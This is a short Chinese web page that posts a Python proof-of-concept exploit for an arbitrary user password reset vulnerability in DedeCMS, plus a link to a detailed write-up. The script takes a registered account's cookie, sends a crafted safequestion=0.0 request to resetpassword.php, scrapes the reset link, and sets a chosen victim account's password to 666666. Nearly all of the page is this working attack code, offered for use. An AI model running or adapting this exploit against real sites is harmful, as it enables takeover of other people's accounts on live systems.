DeDecms(织梦CMS)最新版任意用户密码重置漏洞POC

poc:

# coding=utf-8

import re
import requests
from bs4 import BeautifulSoup

if __name__ == "__main__":
    host = 'http://127.0.0.1/dedecms/'
    cookie = "PHPSESSID=hi7jm3fncr0q79du7tvu3bm406; DedeUserID=8; DedeUserID__ckMd5=7903ea0790a3690a; DedeLoginTime=1515641375; DedeLoginTime__ckMd5=0a847f5adbfcbbd4"
    # 注册账号的cookie
    num = 2
    # 要修改密码的id

    headers = {'Cookie': cookie}
    rs = requests.get(host + '/member/index.php', headers=headers)
    if '/member/myfriend.php' in rs.text and '/member/pm.php' in rs.text:
        print '账号登陆成功'
    else:
        exit('账号登陆失败!')

    payload_url1 = "{host}/member/resetpassword.php?dopost=safequestion&safequestion=0.0&safeanswer=&id={num}".format(
        host=host,
        num=num)
    rs = requests.get(payload_url1, headers=headers)
    if '对不起,请10分钟后再重新申请'.decode('utf-8') in rs.text:
        exit('对不起,请10分钟后再重新申请').decode('utf-8')

    searchObj = re.search(r'<a href=\'(.*?)\'>', rs.text, re.M | re.I)
    payload_url2 = searchObj.group(1)
    payload_url2 = payload_url2.replace('amp;', '')
    print 'Payload : ' + payload_url2
    rs = requests.get(payload_url2, headers=headers)
    soup = BeautifulSoup(rs.text, "html.parser")
    userid = soup.find_all(attrs={"name": "userid"})[0]['value']
    key = soup.find_all(attrs={"name": "key"})[0]['value']
    data = {'dopost': 'getpasswd', 'setp': 2, 'id': num, 'userid': userid, 'key': key, 'pwd': 666666, 'pwdok': 666666}
    rs = requests.post(host + "/member/resetpassword.php", data=data, headers=headers)
    if '更改密码成功,请牢记新密码'.decode('utf-8') in rs.text:
        print '更改密码成功'.decode('utf-8')
        print '账号:'.decode('utf-8') + userid
        print '密码:'.decode('utf-8') + '666666'
    else:
        print '更改密码失败'.decode('utf-8')


详细利用过程:https://xianzhi.aliyun.com/forum/topic/1926 


分享到:更多

相关推荐

发表评论

路人甲 表情
看不清楚?点图切换 Ctrl+Enter快速提交

网友评论(0)